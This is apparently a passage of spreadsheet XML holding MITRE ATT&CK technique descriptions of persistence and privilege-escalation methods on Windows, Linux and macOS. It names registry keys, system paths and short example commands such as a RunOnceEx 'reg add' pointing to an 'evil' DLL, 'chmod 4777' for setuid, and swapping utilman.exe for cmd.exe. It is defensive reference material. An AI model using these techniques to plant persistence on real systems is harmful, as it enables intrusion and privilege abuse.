    <s v="Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.  _x000a__x000a_Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022) _x000a__x000a_Inside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service)  _x000a__x000a_* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start._x000a_* `ExecReload` directive executes when a service restarts. _x000a_* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped.  _x000a__x000a_Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016) _x000a__x000a_The .service file’s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions. "/>
  </r>
  <r>
    <x v="127"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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quot;Bring Your Own Vulnerable Driver&quot; (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)_x000a__x000a_Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002)._x000a__x000a_To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create ‘hidden’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r>
  <r>
    <x v="127"/>
    <x v="7"/>
    <s v="Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in &lt;code&gt;/System/Library/LaunchDaemons/&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt;. Required Launch Daemons parameters include a &lt;code&gt;Label&lt;/code&gt; to identify the task, &lt;code&gt;Program&lt;/code&gt; to provide a path to the executable, and &lt;code&gt;RunAtLoad&lt;/code&gt; to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)_x000a__x000a_Adversaries may install a Launch Daemon configured to execute at startup by using the &lt;code&gt;RunAtLoad&lt;/code&gt; parameter set to &lt;code&gt;true&lt;/code&gt; and the &lt;code&gt;Program&lt;/code&gt; parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)_x000a__x000a_Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as &lt;code&gt;usr/local/bin&lt;/code&gt; to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)"/>
  </r>
  <r>
    <x v="127"/>
    <x v="7"/>
    <s v="Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for creating and managing individual containers, such as Docker and Podman, as well as container cluster node-level agents such as kubelet. By modifying these services, an adversary may be able to achieve persistence or escalate their privileges on a host._x000a__x000a_For example, by using the `docker run` or `podman run` command with the `restart=always` directive, a container can be configured to persistently restart on the host.(Citation: AquaSec TeamTNT 2023) A user with access to the (rootful) docker command may also be able to escalate their privileges on the host.(Citation: GTFOBins Docker)_x000a__x000a_In Kubernetes environments, DaemonSets allow an adversary to persistently [Deploy Container](https://attack.mitre.org/techniques/T1610)s on all nodes, including ones added later to the cluster.(Citation: Aquasec Kubernetes Attack 2023)(Citation: Kubernetes DaemonSet) Pods can also be deployed to specific nodes using the `nodeSelector` or `nodeName` fields in the pod spec.(Citation: Kubernetes Assigning Pods to Nodes)(Citation: AppSecco Kubernetes Namespace Breakout 2020)_x000a__x000a_Note that containers can also be configured to run as [Systemd Service](https://attack.mitre.org/techniques/T1543/002)s.(Citation: Podman Systemd)(Citation: Docker Systemd)"/>
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. "/>
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened._x000a__x000a_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_x000a__x000a_* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\open\command&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\print\command&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\printto\command&lt;/code&gt;_x000a__x000a_The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012)"/>
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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_x000a__x000a_The following screensaver settings are stored in the Registry (&lt;code&gt;HKCU\Control Panel\Desktop\&lt;/code&gt;) and could be manipulated to achieve persistence:_x000a__x000a_* &lt;code&gt;SCRNSAVE.exe&lt;/code&gt; - set to malicious PE path_x000a_* &lt;code&gt;ScreenSaveActive&lt;/code&gt; - set to '1' to enable the screensaver_x000a_* &lt;code&gt;ScreenSaverIsSecure&lt;/code&gt; - set to '0' to not require a password to unlock_x000a_* &lt;code&gt;ScreenSaveTimeout&lt;/code&gt; - sets user inactivity timeout before screensaver is executed_x000a__x000a_Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017)"/>
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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 or the computer's uptime.(Citation: Mandiant M-Trends 2015)_x000a__x000a_Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts – using `mofcomp.exe`  –into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)_x000a__x000a_WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges."/>
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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Citation: macOS MS office sandbox escape)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
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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_x000a__x000a_Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where &quot;command list&quot; will be executed when &quot;signals&quot; are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)"/>
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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Citation: Writing Bad Malware for OSX) There are tools available to perform these changes._x000a__x000a_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Citation: Malware Persistence on OS X)"/>
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt;._x000a__x000a_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Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)"/>
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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_x000a__x000a_Two common accessibility programs are &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt;, launched when the shift key is pressed five times and &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as &quot;sticky keys&quot;, and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)_x000a__x000a_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_x000a__x000a_For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;) may be replaced with &quot;cmd.exe&quot;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_x000a__x000a_Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)_x000a__x000a_* On-Screen Keyboard: &lt;code&gt;C:\Windows\System32\osk.exe&lt;/code&gt;_x000a_* Magnifier: &lt;code&gt;C:\Windows\System32\Magnify.exe&lt;/code&gt;_x000a_* Narrator: &lt;code&gt;C:\Windows\System32\Narrator.exe&lt;/code&gt;_x000a_* Display Switcher: &lt;code&gt;C:\Windows\System32\DisplaySwitch.exe&lt;/code&gt;_x000a_* App Switcher: &lt;code&gt;C:\Windows\System32\AtBroker.exe&lt;/code&gt;"/>
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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_x000a__x000a_The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)"/>
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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_x000a__x000a_A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:_x000a__x000a_* &lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt; and_x000a_* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;_x000a__x000a_Custom databases are stored in:_x000a__x000a_* &lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt; and_x000a_* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures &quot;cmd.exe,&quot; or another program that provides backdoor access, as a &quot;debugger&quot; for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the &quot;debugger&quot; program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)_x000a__x000a_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_x000a__x000a_Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)"/>
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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_x000a__x000a_[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_x000a__x000a_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_x000a__x000a_An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)"/>
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)_x000a__x000a_Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)_x000a__x000a_Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed._x000a__x000a_For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. These installation routines may also include instructions to perform additional actions that may be abused by adversaries.(Citation: Microsoft Installation Procedures)"/>
  </r>
  <r>
    <x v="128"/>
    <x v="7"/>
    <s v="Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)_x000a__x000a_Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)"/>
  </r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="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_x000a__x000a_Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges."/>
  </r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the &quot;run keys&quot; in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level._x000a__x000a_The following run keys are created by default on Windows systems:_x000a__x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;_x000a__x000a_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quot;Depend&quot; key with RunOnceEx: &lt;code&gt;reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d &quot;C:\temp\evil[.]dll&quot;&lt;/code&gt; (Citation: Oddvar Moe RunOnceEx Mar 2018)_x000a__x000a_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_x000a__x000a_The following Registry keys can be used to set startup folder items for persistence:_x000a__x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;_x000a__x000a_The following Registry keys can control automatic startup of services during boot:_x000a__x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;_x000a__x000a_Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:_x000a__x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;_x000a__x000a_Programs listed in the load value of the registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; run automatically for the currently logged-on user._x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="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Citation: MSDN Authentication Packages)_x000a__x000a_Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\&lt;/code&gt; with the key value of &lt;code&gt;&quot;Authentication Packages&quot;=&amp;lt;target binary&amp;gt;&lt;/code&gt;. The binary will then be executed by the system when the authentication packages are loaded."/>
  </r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)_x000a__x000a_Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\`.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)_x000a__x000a_Adversaries may abuse this architecture to establish persistence, specifically by creating a new arbitrarily named subkey  pointing to a malicious DLL in the `DllName` value. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)"/>
  </r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="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Citation: Cylance Reg Persistence Sept 2013) _x000a__x000a_Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)_x000a__x000a_* Winlogon\Notify - points to notification package DLLs that handle Winlogon events_x000a_* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on_x000a_* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on_x000a__x000a_Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence."/>
  </r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="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Citation: Linux Kernel Programming) _x000a__x000a_When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)_x000a__x000a_Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through &lt;code&gt;kextload&lt;/code&gt; and &lt;code&gt;kextunload&lt;/code&gt; commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)_x000a__x000a_Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as &quot;Legacy System Extensions&quot; since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)_x000a__x000a_Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)"/>
  </r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to &quot;Reopen windows when logging back in&quot;.(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named &lt;code&gt;com.apple.loginwindow.[UUID].plist&lt;/code&gt; within the &lt;code&gt;~/Library/Preferences/ByHost&lt;/code&gt; directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon._x000a__x000a_Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the &lt;code&gt;com.apple.loginwindow.[UUID].plist&lt;/code&gt; file to execute payloads when a user logs in."/>
  </r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="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ation: Microsoft Security Subsystem)_x000a__x000a_Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads."/>
  </r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process._x000a__x000a_Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program._x000a__x000a_Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware."/>
  </r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the &lt;code&gt;AddMonitor&lt;/code&gt; API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot.(Citation: Bloxham) _x000a__x000a_Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to the `Driver` value of an existing or new arbitrarily named subkey of &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. The Registry key contains entries for the following:_x000a__x000a_* Local Port_x000a_* Standard TCP/IP Port_x000a_* USB Monitor_x000a_* WSD Port_x000a_"/>
  </r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors)_x000a__x000a_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_x000a__x000a_For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt; API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020)_x000a__x000a_The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges."/>
  </r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.(Citation: Free Desktop Application Autostart Feb 2006)(Citation: Free Desktop Entry Keys)_x000a__x000a_Adversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the `Exec` directive in the `.desktop` configuration file. When the user’s desktop environment is loaded at user login, the `.desktop` files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the `/etc/xdg/autostart` directory while the user entries are located in the `~/.config/autostart` directory._x000a__x000a_Adversaries may combine this technique with [Masquerading](https://attack.mitre.org/techniques/T1036) to blend malicious Autostart entries with legitimate programs.(Citation: Red Canary Netwire Linux 2022)"/>
  </r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="129"/>
    <x v="7"/>
    <s v="Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call &lt;code&gt;SMLoginItemSetEnabled&lt;/code&gt;._x000a__x000a_Login items installed using the Service Management Framework leverage &lt;code&gt;launchd&lt;/code&gt;, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications._x000a__x000a_Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as &lt;code&gt;tell application “System Events” to make login item at end with properties /path/to/executable&lt;/code&gt;.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt;.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)"/>
  </r>
  <r>
    <x v="130"/>
    <x v="11"/>
    <s v="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Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)"/>
  </r>
  <r>
    <x v="130"/>
    <x v="11"/>
    <s v="An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges._x000a__x000a_Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The &lt;code&gt;chmod&lt;/code&gt; command can set these bits with bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;. This will enable the setuid bit. To enable the setgid bit, &lt;code&gt;chmod 2775&lt;/code&gt; and &lt;code&gt;chmod g+s&lt;/code&gt; can be used._x000a__x000a_Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a 